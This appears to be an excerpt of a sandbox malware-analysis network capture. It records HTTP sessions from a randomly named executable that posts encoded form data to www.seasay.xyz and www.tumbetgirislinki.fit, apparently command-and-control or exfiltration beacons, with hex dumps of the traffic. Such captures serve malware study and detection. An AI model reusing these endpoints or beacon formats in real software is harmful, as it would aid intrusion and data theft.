                                                                                  Data Ascii: cf2hYv=W0JY4Dlg8zmW5myWMVZXJvIym5u6BxHcnV3kzE9purauoyhpOQts1XyFUFutFxYiYKPsTDh1Y2rI0D4Io3QoXDESyqzmLXZiodmxLpU1XI2L4OnK7+REuC2RD2WuSIB462Qj/3B5b1vku3GZFuaPge+BwUCK9P/eq+yzCm5xzh6i+vBdvAYlAkdeOLLRGRJcPHv12kyZsz8ABLox40A2Wro8j0QGIhAVcQ==
                                                                                  Feb 18, 2025 08:08:53.945409060 CET240INHTTP/1.1 302 Found
                                                                                  Location: https://www.seasay.xyz/c9ts/
                                                                                  Server: Dynamic Http Server
                                                                                  X-Ratelimit-Limit: 101
                                                                                  X-Ratelimit-Remaining: 100
                                                                                  X-Ratelimit-Reset: 1
                                                                                  Date: Tue, 18 Feb 2025 07:08:53 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.649987103.106.67.112803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:08:55.865401983 CET1841OUTPOST /c9ts/ HTTP/1.1
                                                                                  Host: www.seasay.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.seasay.xyz
                                                                                  Referer: http://www.seasay.xyz/c9ts/
                                                                                  Content-Length: 1247
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Data Raw: 63 66 32 68 59 76 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 6d 79 57 4d 56 5a 58 4a 76 49 79 6d 35 75 36 42 78 48 63 6e 56 33 6b 7a 45 39 70 75 72 53 75 6f 44 42 70 4f 7a 46 73 36 33 79 46 61 6c 75 73 46 78 59 37 59 4b 48 6f 54 44 64 4c 59 31 54 49 6d 56 30 49 76 47 51 6f 4f 54 45 53 2b 4b 7a 6e 50 58 5a 4e 6f 64 57 39 4c 70 45 31 58 49 32 4c 34 49 44 4b 74 2f 52 45 73 43 32 65 45 32 57 71 44 59 42 55 36 32 35 57 2f 33 45 43 62 6c 50 6b 67 33 57 5a 4b 39 69 50 6f 65 2b 44 39 30 44 56 39 50 36 45 71 36 72 4d 43 6c 6c 66 7a 6a 6d 69 39 4c 55 6e 38 6a 49 6e 62 58 78 68 59 62 58 67 4a 47 78 53 57 6b 58 6b 39 6e 2b 47 70 6e 35 72 5a 65 4a 74 36 58 31 75 66 35 63 43 70 77 4e 4b 64 52 64 51 47 4a 35 52 6d 78 35 65 76 76 5a 55 6c 6b 35 63 79 32 58 65 32 43 7a 35 58 37 38 41 77 44 7a 34 45 67 6f 6e 52 7a 55 67 6a 2f 63 72 4f 74 33 6e 45 6c 73 6b 4f 62 6d 69 4a 77 34 70 39 31 72 32 5a 30 33 2f 35 73 6e 58 71 41 58 73 76 36 35 4a 70 72 64 70 42 35 42 66 7a 72 47 46 44 38 52 67 4f 53 70 6f 67 39 35 4e 32 78 63 [TRUNCATED]
                                                                                  Data Ascii: cf2hYv=W0JY4Dlg8zmW5myWMVZXJvIym5u6BxHcnV3kzE9purSuoDBpOzFs63yFalusFxY7YKHoTDdLY1TImV0IvGQoOTES+KznPXZNodW9LpE1XI2L4IDKt/REsC2eE2WqDYBU625W/3ECblPkg3WZK9iPoe+D90DV9P6Eq6rMCllfzjmi9LUn8jInbXxhYbXgJGxSWkXk9n+Gpn5rZeJt6X1uf5cCpwNKdRdQGJ5Rmx5evvZUlk5cy2Xe2Cz5X78AwDz4EgonRzUgj/crOt3nElskObmiJw4p91r2Z03/5snXqAXsv65JprdpB5BfzrGFD8RgOSpog95N2xc5bIRH2pB3a9+8FcYcV+nbW0GQBlYAQE8GeV9Bhdo5QkK6eGiR5nfIDaBGphjFxLSD998Kphw7LaXFhk/Ak7AWdx9Qg2wp4AoQAwLjWkIR7SYk731k6y+lLHL8/djM28D9N8et9EUl7MGbSp7V17XnxxIPMOnm9meQ/HXwbrypXLbDZ+to63J+GJEu3XnsFUy2YEvqJVjTe+Dhw/65IKHTbZ1Ru2sZoiSkbSkLc3kHCSPUlwfys5nLFl8YGIFALiR70Dl5doQXiUL6pJTfr3gdC+rf2pUbrX86C2sOICohq8qhIyTt27B8RehspdcctyY8Cv+XPz/jcLKL/VTeBLeOMvF8ZAvT0bDkSY4eQ6EQf4TQ0BkHXiBlQ6IpiJb6LJ5kzHffhjpI8hYxN6N78CrA9peZfb8k47sh52WbWZo8Wjj/dEN8bpRzhENSTFRqorj0V6lLMIvYPsAydLj25xPkUlX58PCPGKONZ4IxSiVQogrAndmU0QnoQY/z0Rw8wa+PUwC2yTn0uPHpH5GqDoFK6GY1HG+PgD7Us6f9JuVVkvvkNTZKi0bFIDfmqPz4ehK2nUsSK8c8wYvyswOzejQ+reazNi6HY8GPrA04qWCNzOy3jHVaYMdkXjkdV7qVPiUsZQns4yZhXkWJnpdc9+URZ7pPlyn8D/HVC [TRUNCATED]
                                                                                  Feb 18, 2025 08:08:56.529792070 CET240INHTTP/1.1 302 Found
                                                                                  Location: https://www.seasay.xyz/c9ts/
                                                                                  Server: Dynamic Http Server
                                                                                  X-Ratelimit-Limit: 101
                                                                                  X-Ratelimit-Remaining: 100
                                                                                  X-Ratelimit-Reset: 1
                                                                                  Date: Tue, 18 Feb 2025 07:08:56 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.649988103.106.67.112803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:08:58.406344891 CET558OUTGET /c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7QzE7wP7HHXABn4vnPr4KbIzP7onr4No6wwmVIVHMDZ1g/WEU5TU=&WHYh=mJr4VrfpGDBp HTTP/1.1
                                                                                  Host: www.seasay.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Feb 18, 2025 08:08:59.048039913 CET661INHTTP/1.1 302 Found
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Location: https://www.seasay.xyz/c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7QzE7wP7HHXABn4vnPr4KbIzP7onr4No6wwmVIVHMDZ1g/WEU5TU=&WHYh=mJr4VrfpGDBp
                                                                                  Server: Dynamic Http Server
                                                                                  X-Ratelimit-Limit: 101
                                                                                  X-Ratelimit-Remaining: 100
                                                                                  X-Ratelimit-Reset: 1
                                                                                  Date: Tue, 18 Feb 2025 07:08:58 GMT
                                                                                  Content-Length: 217
                                                                                  Connection: close
                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 65 61 73 61 79 2e 78 79 7a 2f 63 39 74 73 2f 3f 63 66 32 68 59 76 3d 62 32 68 34 37 30 35 6a 2f 42 58 75 69 52 4b 74 42 33 4a 74 41 4d 42 43 76 59 7a 50 46 42 66 4d 71 48 53 5a 6e 41 4e 32 35 2f 71 79 2f 51 74 72 4e 77 4a 53 37 57 66 53 53 6a 54 73 45 78 41 79 61 4a 6e 52 55 56 4d 55 4f 6e 53 51 6e 47 4a 34 6d 78 74 37 51 7a 45 37 77 50 37 48 48 58 41 42 6e 34 76 6e 50 72 34 4b 62 49 7a 50 37 6f 6e 72 34 4e 6f 36 77 77 6d 56 49 56 48 4d 44 5a 31 67 2f 57 45 55 35 54 55 3d 26 61 6d 70 3b 57 48 59 68 3d 6d 4a 72 34 56 72 66 70 47 44 42 70 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                  Data Ascii: <a href="https://www.seasay.xyz/c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7QzE7wP7HHXABn4vnPr4KbIzP7onr4No6wwmVIVHMDZ1g/WEU5TU=&amp;WHYh=mJr4VrfpGDBp">Found</a>.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.649990104.21.16.1803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:09:05.147442102 CET834OUTPOST /k566/ HTTP/1.1
                                                                                  Host: www.tumbetgirislinki.fit
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.tumbetgirislinki.fit
                                                                                  Referer: http://www.tumbetgirislinki.fit/k566/
                                                                                  Content-Length: 211
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Data Raw: 63 66 32 68 59 76 3d 63 43 35 32 37 41 69 79 53 71 37 59 38 43 38 48 75 6b 78 44 54 62 79 74 67 4f 69 4e 79 38 4f 69 70 56 65 54 58 6d 56 76 49 6e 64 5a 35 6a 68 57 6e 74 43 58 61 30 79 69 62 77 4a 5a 31 73 5a 63 63 63 45 4b 7a 6b 63 4a 34 77 6c 32 73 6f 69 47 34 59 50 32 39 64 38 7a 6a 43 31 34 73 52 4f 58 52 2f 6a 59 2f 4f 58 46 78 30 55 4a 59 50 57 50 33 49 55 4d 53 71 58 59 6f 2b 66 45 76 6e 2f 43 58 6e 43 5a 49 66 4e 37 49 71 33 33 73 2f 71 33 74 55 77 5a 44 67 47 76 70 43 42 41 68 4f 6e 61 61 48 74 55 69 66 63 30 32 6e 51 37 7a 42 66 61 30 72 59 6e 78 31 73 39 51 38 79 44 4b 44 49 6c 4c 46 63 31 4b 77 39 4e 42 6d 61 4e
                                                                                  Data Ascii: cf2hYv=cC527AiySq7Y8C8HukxDTbytgOiNy8OipVeTXmVvIndZ5jhWntCXa0yibwJZ1sZcccEKzkcJ4wl2soiG4YP29d8zjC14sROXR/jY/OXFx0UJYPWP3IUMSqXYo+fEvn/CXnCZIfN7Iq33s/q3tUwZDgGvpCBAhOnaaHtUifc02nQ7zBfa0rYnx1s9Q8yDKDIlLFc1Kw9NBmaN
                                                                                  Feb 18, 2025 08:09:05.850222111 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 18 Feb 2025 07:09:05 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TEwiwFS9jLW0Q35twxGeGdX1IXFEAGMLwoZFqSWvbA7Udl2j1uI3JliBnNdYpEVBeTHspsKURf9o%2Bzj7OuLh2WZlmTDQri65bPOX1ce1%2F%2BR97TJuTeery1gkAr5fyrJt%2BbEiAy25ahYZ4w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 913c308d7f100f47-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1529&min_rtt=1529&rtt_var=764&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=834&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 31 33 30 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 59 97 a3 4a 72 7e bf bf 42 ae 39 b6 67 0e 5d cd be d5 ad 6a 1b 10 12 48 02 01 12 92 d0 cb 3d 09 24 8b 58 c5 2e f9 cc 0f f2 df f0 2f f3 51 55 2f d5 55 52 77 df 19 3f 38 1f 4a 64 66 44 64 64 2c 5f 50 99 fc f6 db 6f 8f ff 32 5e 4a 6b c7 90 47 51 93 a5 9f 7e 7b 7c f9 19 8d 46 a3 c7 08 02 ff f3 63 06 1b 30 8a 9a a6 bc 87 c7 36 ee 9e ee a4 22 6f 60 de dc 37 a7 12 de 8d bc 97 de d3 5d 03 87 06 bd 88 f8 7d e4 45 a0 aa 61 f3 d4 36 c1 3d 77 77 53 0e f0 22 78 7f e1 af 8a f4 95 a0 bc b8 f7 2e 53 37 19 8d 0a 84 19 f8 33 1c f2 50 c6 15 ac 5f b1 60 df d1 e6 20 83 4f 77 5d 0c fb b2 a8 9a 57 64 7d ec 37 d1 93 0f bb d8 83 f7 cf 9d 0f a3 38 8f 9b 18 a4 f7 b5 07 52 f8 84 7f fc 2a aa 89 9b 14 7e a2 30 6a a4 17 cd 68 52 b4 b9 ff 88 be 0c be 10 d4 cd 29 85 a3 8b dd 3e 9b cb ab eb cf cc 97 e6 16 fe 69 f4 5f 5f bb 97 16 14 79 73 1f 80 2c 4e 4f 0f 23 a1 8a 41 fa 61 a4 c0 b4 83 4d ec 81 0f a3 1a e4 f5 7d 0d ab 38 f8 fd 3d 5b 1d 9f e1 c3 08 a7 ca e1 fb c9 34 ce e1 7d 04 e3 [TRUNCATED]
                                                                                  Data Ascii: 1303ZYJr~B9g]jH=$X./QU/URw?8JdfDdd,_Po2^JkGQ~{|Fc06"o`7]}Ea6=wwS"x.S73P_` Ow]Wd}78R*~0jhR)>i__ys,NO#AaM}8=[4}0jFGh
                                                                                  Feb 18, 2025 08:09:05.850241899 CET224INData Raw: a7 08 fe 7b 2a 17 78 49 58 5d f6 70 ef 15 69 51 3d 8c fe 12 3c b7 ef c9 be cc 11 13 92 20 b1 ef e7 4a e0 fb 71 1e 3e 8c de 8c 67 a0 0a e3 fc bb e1 bf 7f 7d aa a1 d7 c4 45 fe 61 14 14 45 03 ab 37 f6 f0 e3 ba 4c c1 e9 61 e4 a6 85 97 fc 1f 2c f7 f1
                                                                                  Data Ascii: {*xIX]piQ=< Jq>g}EaE7La,jVzOa<@W/V|?M+XE^87h+|x-j^Oc.G.xkSyuU{^*Z+XB<OI
                                                                                  Feb 18, 2025 08:09:05.850258112 CET1236INData Raw: fd 92 46 e0 c6 a6 7e 5d c4 7d dc c0 ac 7e 23 e6 6b 24 11 58 39 bc 8b ed 38 ff 96 ca 3c 79 23 d0 5e fb e3 7a 98 bb 45 d3 14 d9 cb 1a b7 a1 84 f9 15 f9 6f cd 70 71 f7 bd 0f bd a2 02 97 ad 3e 8c da dc 87 d5 05 84 ae 5b 9c 22 38 51 12 7e 61 9d 87 a8
                                                                                  Data Ascii: F~]}~#k$X98<y#^zEopq>["8Q~a`tPxm}{xM>#Y{+5G3f_4rc>w~P;-:%.{O4V"\pF-{a@oM}fyxI{mV${]
                                                                                  Feb 18, 2025 08:09:05.850272894 CET1236INData Raw: 3b a6 6a c8 ec 30 19 e3 84 d3 9d 98 55 77 2c 16 4b 2d e0 e9 04 11 bb f0 58 84 d2 44 1a 08 42 f7 d3 66 89 c3 d2 f1 d8 93 27 cf 57 40 e5 11 5b 70 8c e9 32 9d 8f 4d e7 34 8c 0d 5e 2f 8f 1d a6 cf f7 c9 8a 9d b6 ba 65 c6 21 5d 76 c0 31 7b 7f 7d 6e 0e
                                                                                  Data Ascii: ;j0Uw,K-XDBf'W@[p2M4^/e!]v1{}nV.Ub.aK-HX.@m38q02j2l,8Jk.GDeHU488Vt Jku&Yq5ecXk>0PPjjlq"y/k_RB(
                                                                                  Feb 18, 2025 08:09:05.850286961 CET1236INData Raw: 38 6d 75 3c 19 7c d2 de f0 9b 9d e0 77 f9 21 6f d4 a4 8e f0 0d 29 ae 20 3a 56 6d 55 11 7d 4b d2 b4 0d b3 cc 95 aa d9 92 ee e0 71 9b d9 26 33 4c 44 9d 98 99 db 9c ec 10 1e 60 c6 6c ea 73 0f f4 19 ad 9a 6b be e2 04 7b 82 51 e8 b8 d0 54 44 8f f0 fd
                                                                                  Data Ascii: 8mu<|w!o) :VmU}Kq&3LD`lsk{QTD(/V4!uR:7U9%6[*i"uF%riLM;z,D<M 6bMV;C\KFYIgY[vl}8E!vLuHJ=(
                                                                                  Feb 18, 2025 08:09:05.850301981 CET616INData Raw: bb 14 e0 03 d7 65 5c 08 38 c0 b9 c0 f5 5c 18 b8 1c 06 03 e8 c2 80 63 02 37 20 5d da a5 5c da 85 01 11 b8 97 d5 2e 1c 97 95 80 17 d0 20 00 d0 65 5c de 85 20 70 3d 97 00 bc 4b 00 ce 65 9f 35 c3 5c 22 b8 e8 47 80 20 a0 5c 0c 42 e8 43 3f a0 02 17 b8
                                                                                  Data Ascii: e\8\c7 ]\. e\ p=Ke5\"G \BC?) \HB7p/{.t<t!a>0>i.>@>ko:q~q%U=@{}7o/[Wxd|&\tYx


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.649991104.21.16.1803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:09:07.693563938 CET858OUTPOST /k566/ HTTP/1.1
                                                                                  Host: www.tumbetgirislinki.fit
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.tumbetgirislinki.fit
                                                                                  Referer: http://www.tumbetgirislinki.fit/k566/
                                                                                  Content-Length: 235
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Data Raw: 63 66 32 68 59 76 3d 63 43 35 32 37 41 69 79 53 71 37 59 39 67 6f 48 73 46 78 44 62 62 79 71 6c 4f 69 4e 35 63 4f 2b 70 56 43 54 58 6a 74 2f 49 56 35 5a 67 48 6c 57 6d 73 43 58 58 55 79 69 44 67 4a 41 36 4d 5a 74 63 63 34 43 7a 67 41 4a 34 77 68 32 73 71 36 47 34 72 33 31 39 4e 38 78 33 79 31 41 7a 68 4f 58 52 2f 6a 59 2f 4b 48 76 78 30 4d 4a 59 2b 6d 50 6d 62 4d 50 52 71 58 62 72 2b 66 45 34 58 2f 4f 58 6e 44 4d 49 65 52 46 49 73 72 33 73 39 79 33 30 6c 77 61 55 77 47 70 6b 69 41 52 68 4d 71 70 63 57 49 51 37 4a 59 53 6e 6c 78 5a 37 58 43 41 6f 59 59 45 6a 6c 4d 2f 51 2b 71 78 4b 6a 49 50 4a 46 6b 31 59 6e 78 71 4f 53 2f 75 37 49 56 30 76 46 30 4b 55 34 7a 46 75 62 4e 6c 49 57 56 51 75 41 3d 3d
                                                                                  Data Ascii: cf2hYv=cC527AiySq7Y9goHsFxDbbyqlOiN5cO+pVCTXjt/IV5ZgHlWmsCXXUyiDgJA6MZtcc4CzgAJ4wh2sq6G4r319N8x3y1AzhOXR/jY/KHvx0MJY+mPmbMPRqXbr+fE4X/OXnDMIeRFIsr3s9y30lwaUwGpkiARhMqpcWIQ7JYSnlxZ7XCAoYYEjlM/Q+qxKjIPJFk1YnxqOS/u7IV0vF0KU4zFubNlIWVQuA==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.649992104.21.16.1803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:09:10.240636110 CET1871OUTPOST /k566/ HTTP/1.1
                                                                                  Host: www.tumbetgirislinki.fit
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.tumbetgirislinki.fit
                                                                                  Referer: http://www.tumbetgirislinki.fit/k566/
                                                                                  Content-Length: 1247
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Data Raw: 63 66 32 68 59 76 3d 63 43 35 32 37 41 69 79 53 71 37 59 39 67 6f 48 73 46 78 44 62 62 79 71 6c 4f 69 4e 35 63 4f 2b 70 56 43 54 58 6a 74 2f 49 56 78 5a 67 55 39 57 6e 50 71 58 57 55 79 69 64 77 4a 46 36 4d 5a 4b 63 63 67 34 7a 6e 49 6a 34 79 4a 32 74 4a 79 47 2b 61 33 31 33 4e 38 78 6f 69 31 37 73 52 4f 47 52 2f 7a 63 2f 4f 6a 76 78 30 4d 4a 59 39 75 50 32 34 55 50 58 71 58 59 6f 2b 66 59 76 6e 2b 52 58 6a 75 33 49 65 6c 56 49 2f 7a 33 73 64 69 33 76 33 59 61 58 51 47 72 6a 69 41 4a 68 4d 6d 32 63 57 45 32 37 4a 45 73 6e 6d 74 5a 37 51 47 64 31 62 49 41 2b 6c 73 77 4e 35 47 6f 53 6a 46 37 4b 55 59 4b 54 31 39 49 51 53 50 36 31 63 70 38 70 47 52 58 62 4f 37 2f 72 2b 41 4f 4f 69 4d 62 39 6d 47 46 51 51 72 45 49 61 4f 54 57 33 70 47 79 66 77 32 31 58 4d 63 54 6e 69 78 78 48 4b 49 52 49 50 70 43 57 70 32 39 57 72 32 6a 38 67 72 43 30 71 49 6c 5a 4f 54 69 53 33 4e 5a 52 6f 37 57 42 68 72 66 79 30 5a 6d 70 7a 50 6d 7a 42 4d 61 36 34 36 62 34 68 71 7a 50 43 6d 44 2b 34 4a 69 55 59 77 53 77 47 32 74 76 73 [TRUNCATED]
                                                                                  Data Ascii: cf2hYv=cC527AiySq7Y9goHsFxDbbyqlOiN5cO+pVCTXjt/IVxZgU9WnPqXWUyidwJF6MZKccg4znIj4yJ2tJyG+a313N8xoi17sROGR/zc/Ojvx0MJY9uP24UPXqXYo+fYvn+RXju3IelVI/z3sdi3v3YaXQGrjiAJhMm2cWE27JEsnmtZ7QGd1bIA+lswN5GoSjF7KUYKT19IQSP61cp8pGRXbO7/r+AOOiMb9mGFQQrEIaOTW3pGyfw21XMcTnixxHKIRIPpCWp29Wr2j8grC0qIlZOTiS3NZRo7WBhrfy0ZmpzPmzBMa646b4hqzPCmD+4JiUYwSwG2tvsOKW2LIrEi3AyemeOrCEnP/Y9duC5ViP968lju2JcFPSy39nliJ0hkAIb7Q3WErqY6gjpc/UKIDV10P33gytTqjDTA4JzCX4Ib4W3wuRhvjTV0zybnRds/EvXctD5G3N5bG8RFY1LevMS401qL0KSmKlmHXHc0zwXenMOOESlmmaQ1Lk7latjGUE5Sv+e5EWE6M2JphS4qbD8TGzLu1MrkzsjBMQnrJUHRVEAMM9Z0S8WGVifhx0RB9ZL6obnI+SgNBzqNPY1YUWgSzRYHyM0N5JKn74BFnWTFR31StwE5CLmbyUmy+iSVQfqtI/lo+FGP7tcv+4lHWn0T7DhVY/ilV4S78vgfEWmBG55o75i/gNUZAH1nOcD64yk3g4cx5yU0BQ+DZ8wLuLsA7rNcxYxChHUrvTEHda6Z9VG0iA4nPXZKJhxcHDLLqafLD6IvxhFcsC0aGnsvh1nmk+3M/fEHUkDg+8yepln3AMIjxL6ZMP+Ri63ue/D2rAWfQ09tLlZrWKebDq/PSo8EYj86iQ4wSu33EbSrRCICh55CFSGZ0F6pysACSI7KyIMAufVnpAVDCaQg5K83R5S04NjaVtToGheU93gkVq87cSTy+wff+3xWtwzMmVvZiuVOnEYxbpjTKj3a57T0qMQepeKOxvjYEAKWXE+WDRQZf [TRUNCATED]
                                                                                  Feb 18, 2025 08:09:10.958106995 CET919INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 18 Feb 2025 07:09:10 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u3coZ%2F4233%2FVecI153Ay694mczKIS5ollP4c%2FKWzTzWqZhA5X5q%2BDtD5yoOfkDJfSrA8gYPA0qjSrIuY%2FvsW8716VMbSPHmk%2B1PeP1L01G5rodbZIIvXlDBz74GsKGEKasJaykNCObgtm0w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 913c30ad6ab58c30-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2028&rtt_var=1014&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1871&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a
                                                                                  Data Ascii: 13
                                                                                  Feb 18, 2025 08:09:10.958475113 CET1236INData Raw: 31 32 66 62 0d 0a cc 5a d9 76 a3 4c 92 be ef a7 60 dc 67 66 ba 0f e5 62 df fc db 35 03 08 01 92 40 80 84 24 74 d3 87 25 59 c4 2a 76 69 4e 3f d0 bc c6 3c d9 1c d9 ae fa 5d b6 54 55 7f f7 5c 4c 5e 58 64 66 44 64 64 2c 5f e0 4c 1e ff 65 b2 14 d7 8e
                                                                                  Data Ascii: 12fbZvL`gfb5@$t%Y*viN?<]TU\L^XdfDdd,_Le!Aqg_A7x}ABqV%X-(T;=`l ?vO]w7~/uTe&QQi4oXh7Ow}7dCSOPR$mffMTB$-4-"x
                                                                                  Feb 18, 2025 08:09:10.958523989 CET224INData Raw: 4a bb db 65 67 b9 61 2d 66 6d 12 e2 34 55 c6 6a 3e c6 ea d0 aa c2 10 a9 9d e3 90 1d 82 74 9b 19 7e ac 16 f3 09 63 b2 2d be 67 c6 6a 42 14 74 93 ba 1c 82 7b 1a a7 f5 67 ba 94 a5 d3 6e 5a ce 95 30 8f 41 09 86 91 f3 1d 10 6f 3a 43 d1 d6 e4 a1 8a 4f
                                                                                  Data Ascii: Jega-fm4Uj>t~c-gjBt{gnZ0Ao:COB+b9a't[3NKpqz(9"8Pkl4Je%-IqM(Ha!EX.*Yfywh oi*1OMM
                                                                                  Feb 18, 2025 08:09:10.958564043 CET1236INData Raw: f7 e4 ad c6 89 c8 93 ab f5 14 1e 22 b6 56 18 e9 ac 0d 47 3d f1 1c 82 cd b3 7e 37 9f 04 36 55 4d 14 62 6d a5 19 89 f6 e3 2c dd c3 93 25 ae 77 08 a1 14 27 91 69 31 aa f4 64 a1 3d 5a 53 6b 57 d2 30 ba a7 1c 33 a6 16 4a c0 39 f2 76 d9 4c 61 4e 6d a8
                                                                                  Data Ascii: "VG=~76UMbm,%w'i1d=ZSkW03J9vLaNm~h,,/CIBk'k6&6p---ATB`UK>+0Pw`h 21@6i4|2BY'iqoMLpa{Zk\3iF!+qW
